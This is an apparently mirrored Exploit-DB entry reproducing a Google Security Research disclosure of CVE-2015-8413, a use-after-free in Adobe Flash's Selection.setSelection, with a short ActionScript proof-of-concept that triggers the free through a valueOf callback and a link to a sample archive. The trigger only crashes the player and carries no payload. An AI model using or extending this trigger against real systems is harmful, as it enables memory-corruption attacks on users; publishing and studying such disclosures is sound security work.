- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39043
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS_X86-64
- CVE
- cve-2015-8413
- Дата публикации
- 2015-12-18
Adobe Flash Selection.SetSelection - Use-After-Free
Код:
Source: https://code.google.com/p/google-security-research/issues/detail?id=590
There is a use-after-free in Selection.SetSelection. If it is called with a number parameter, which is an object with valueOf defined, and this function frees the parent of the TextField parameter, the object is used after it is freed. A minimal PoC follows:
var mc = this.createEmptyMovieClip("mc", 301);
var myText_txt = mc.createTextField("myText_txt", 302, 1, 1, 100, 100);
myText_txt.text = "this is my text";
Selection.setFocus("myText_txt");
var n = {valueOf : func};
Selection.setSelection(n, 3);
function func(){
mc.removeMovieClip();
// Fix heap here
return 0;
}
A sample swf and fla are attached. Note that this PoC only works on 64-bit platforms.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39043.zip- Источник
- www.exploit-db.com
